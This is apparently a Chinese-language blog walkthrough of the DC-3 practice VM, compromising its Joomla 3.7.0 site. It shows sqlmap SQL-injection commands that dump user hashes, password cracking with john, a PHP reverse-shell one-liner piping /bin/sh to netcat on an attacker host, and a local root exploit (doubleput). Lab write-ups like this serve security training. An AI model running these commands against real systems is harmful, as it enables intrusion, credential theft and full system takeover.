DC-3

DC-3

Posted by Kyon-H on July 9, 2025

1. 环境配置

解决:DC-3 IDE 设备(兹盘/CD-ROM)配置不正确。“ide0:1“上具有 个 IDE 从设备但没有主设备。此配置在虚拟机中 无法正常运行

2. 信息搜集

主机发现:192.168.163.131

image.png300

端口扫描

image.png300

访问网站 http://192.168.163.131/ 获得提示

1
2
dirb http://192.168.163.131/
nikto -h 192.168.163.131

扫描目录发现后台登录 http://192.168.163.131/administrator/index.php

whatweb 发现网站框架 Joomla

image.png300

joomscan 扫描获取详细信息 版本 Joomla 3.7.0

3. 渗透测试

搜索版本漏洞

image.png300

3.1. 数据库爆破

查看 /usr/share/exploitdb/exploits/php/webapps/42033.txt

image.png300

使用该命令:

1
sqlmap -u "http://192.168.163.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --batch

获取到数据库 image.png300

1
2
3
4
5
6
# 获取表
sqlmap -u "http://192.168.163.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb --tables --batch
# 获取列 不能用--batch
sqlmap -u "http://192.168.163.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb -T '#__users' --columns
# 获取用户名 密码
sqlmap -u "http://192.168.163.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb -T '#__users' -C username,password --dump
image
image

获取到用户名、密码

image.png

Joomla 使用 #__ 作为数据库表名的动态前缀占位符,若安装时前缀设为 jos_,则实际表名为 jos_users

将密码保存到 pass.txt 破解密码

1
2
3
4
5
john --wordlist=/usr/share/wordlists/john.lst pass.txt
# snoopy           (?)

# 若显示不需要破解,说明之前已破解过,执行命令
john --show pass.txt

3.2. 反弹shell

尝试登录网站后台,成功。 在拓展-》模板-》beez3 可以上传php文件,上传反弹shell脚本

1
2
3
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.163.132 4444 >/tmp/f');?>

# kali执行 nc -lvvp 4444
graph TD
    A[攻击者输入命令] --> B[Netcat 4444端口]
    B --> C["/tmp/f 管道"]
    C --> D["cat 读取命令"]
    D --> E["/bin/sh 执行命令"]
    E --> F[命令结果]
    F --> B[Netcat发回攻击者]

根据之前扫描发现的目录,尝试访问 http://192.168.163.131/templates/beez3/shell.php

image.png

访问成功,连接到kali,sudo -l , find 提权失败,根据提示进行系统提权

1
2
cat /etc/issue
# Ubuntu 16.04 LTS \n \l

3.3. 系统提权

1
2
3
searchsploit ubuntu 16.04
searchsploit -p linux/local/39772.txt
cat /usr/share/exploitdb/exploits/linux/local/39772.txt

按文件内容下载 https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip 只需要 exploit.tar 文件

利用一句话木马和蚁剑,上传文件 image.png

tar -xvf exploit.tar 解压文件,cd进目录,执行以下命令,即可获得root权限

1
2
./compile.sh
./doubleput

image.png